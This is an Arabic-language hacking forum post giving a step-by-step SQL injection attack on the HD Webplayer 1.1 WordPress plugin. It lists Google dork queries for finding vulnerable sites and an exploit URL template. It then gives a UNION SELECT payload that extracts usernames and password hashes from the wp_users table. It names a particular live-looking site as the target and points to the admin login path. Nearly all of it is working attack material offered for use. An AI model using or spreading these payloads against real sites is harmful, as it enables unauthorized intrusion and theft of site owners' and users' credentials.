السلام عليكم ورحمة الله وبركاته وصف لسكربت WordPress سكربت ممل سكربت يسبب لك الخطر بموقعك وهو يجيب لك راس منتدى بنسبة 100% على سيرفر عام ماهي أشهر ثغراته المصاب بها ثغرات الحقن . يالله فداكم ثغرة . : الاصدار المصاب : Webplayer 1.1 نوع الثغرة : تثغرة ٍ حقن الي ما يعرف يحقن يدوي يستخدم الهافج دورك في محرك البحث قوقل 1 inurl:"/wp-content/plugins/hd-webplayer/config.php?id=" 2 inurl:"/wp-content/plugins/hd-webplayer/playlist.php?videoid=" 3 inurl:"/wp-content/plugins/hd-webplayer/" --------------------------------------- هذا رابط الاستغلال xxxx.com/vb//plugins/hd-webplayer/playlist.php?videoid= تستبدل xxxx برابط الموقع تستبدل vb بمسار السكربت ------------------------ هذا استغلال الحقن اليدوي playlist.php?videoid=1+/*!UNION*/+/*!SELECT*/+group_concat(ID*0x3a*user_login*0x3a*user_pass*0x 3b)*2*3*4*5*6*7+from+wp_users //Number of columns may be different المهم تابع الشرح المصور انا اخترت الهدف هذا http://metodistadesuzano.com/wp-cont....php?videoid=4 وبكذا أنجزنا المهمه . مسار لوحة التحكم http://www.example.com/wp-admin
[CENTER] آسمع قبل ألرحيل ~َ
قوانين المنتدى
